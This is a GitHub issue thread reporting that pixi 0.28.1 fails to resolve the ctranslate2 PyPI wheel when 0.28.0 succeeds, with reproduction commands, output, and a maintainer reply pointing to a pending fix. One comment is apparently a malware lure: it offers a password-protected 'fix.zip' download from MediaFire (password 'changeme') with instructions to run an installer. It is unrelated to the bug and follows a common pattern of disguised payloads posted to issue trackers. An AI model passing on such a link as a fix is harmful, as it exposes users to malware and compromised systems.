### ISSUE TITLE
Pixi 0.28.1 breaks pypi dependency installation

### ISSUE THREAD

**Issue by aistellar** [prefix-dev/pixi#1933]
### Checks

- [X] I have checked that this issue has not already been reported.

- [X] I have confirmed this bug exists on the [latest version](https://github.com/prefix-dev/pixi/releases) of pixi, using `pixi --version`.

### Reproducible example

```shell
$ pixi --version
pixi 0.28.1
$ pixi init
✔ Created /home/user/test/pixi.toml
$ pixi add python
✔ Added python >=3.12.5,<4
$ pixi add --pypi ctranslate2==4.3.1
  × failed to solve the pypi requirements of 'default' 'linux-64'
  ├─▶ failed to resolve pypi dependencies
  ╰─▶ Because ctranslate2==4.3.1 has no wheels with a matching Python ABI tag and you require ctranslate2==4.3.1, we can conclude that your requirements are unsatisfiable.

$ pixi list -x
Package  Version  Build               Size      Kind   Source
python   3.12.5   h2ad013b_0_cpython  30.2 MiB  conda  python-3.12.5-h2ad013b_0_cpython.conda
```

### Issue description

It works in Pixi 0.28.0 but not in 0.28.1. Pixi 0.28.1 fails with the error "no wheels with a matching Python ABI tag".

### Expected behavior

With pixi 0.28.0
```shell
$ pixi self-update --version 0.28.0
✔ Pixi will be updated from 0.28.1 to 0.28.0
✔ Pixi archive downloaded.
✔ Pixi archive uncompressed.
✔ Pixi has been updated to version 0.28.0.
$ pixi init
✔ Created /home/user/test/pixi.toml
$ pixi add python
✔ Added python >=3.12.5,<4
$ pixi add --pypi ctranslate2==4.3.1
✔ Added ctranslate2==4.3.1
Added these as pypi-dependencies.
$ pixi list -x
Package      Version  Build               Size       Kind   Source
ctranslate2  4.3.1                        339.4 MiB  pypi   ctranslate2-4.3.1-cp312-cp312-manylinux_2_17_x86_64.manylinux2014_x86_64.http.whl
python       3.12.5   h2ad013b_0_cpython  30.2 MiB   conda  python-3.12.5-h2ad013b_0_cpython.conda
```

**Comment by aistellar** [comment]
It's also reported in https://github.com/prefix-dev/pixi/issues/771#issuecomment-2310635390

**Comment by cnhbliyou** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ruben-arts** [comment]
I think this was fixed by #1925, release coming soon!
